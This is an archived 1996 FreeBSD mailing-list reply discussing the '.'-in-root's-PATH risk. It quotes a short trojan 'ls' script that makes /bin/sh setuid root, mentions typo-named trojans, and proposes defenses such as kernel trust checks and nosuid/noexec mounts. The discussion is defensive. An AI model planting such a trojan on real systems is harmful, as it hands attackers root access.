Date: Tue, 25 Jun 1996 20:27:06 +1000 (EST) From: Julian Assange <proff@suburbia.net> To: vince@mercury.gaianet.net (-Vince-) Cc: hackers@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! Message-ID: <199606251027.UAA25956@suburbia.net> In-Reply-To: <Pine.BSF.3.91.960625003302.21697j-100000@mercury.gaianet.net> from "-Vince-" at Jun 25, 96 00:33:59 am
next in thread | previous in thread | raw e-mail | index | archive | help
> > Assume root has "." in its path. Hacker puts this little script in > > his dir, maybe also in /tmp/; it's called "ls" (imagine the > > coincidence), and it's executable by all: > > > > #!/bin/sh > > chown root /bin/sh > /dev/null 2>&1 > > chmod u+s,a+x /bin/sh > /dev/null 2>&1 > > ls $\* > > > > Then sits back and waits for the sysadmin to come along and type "ls" > > in one of those directories. > > > > Pop quiz: what is the result? > > Never thought about that one.... > > Vince The result is nothing, unless root's path is ".:$PATH" - hardly a common occurance. What does achieve more success is placing common typographical mistakes in the path as trojans. e.g "sl" or "sl-la" or "ls-la" etc. For this reason only root should not have "." appeneded to the system path. I created kernel level trust circles, so untrusted executables will not be executed. Untrusted is defined as file uid >10 && (file uid !=euid || file uid != uid) || file mode &022. This is not in -current. I hadn't bothered to submit it as I thought it was a little standards breaking (or was that standards creating ?;) A sysctl perhaps. Are people interested in this? But in terms of temp directories and spool directories, these should all be mounted nosuid, noexec, nodev, which solves your problem anyway, and without kernel hackery. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff@suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199606251027.UAA25956>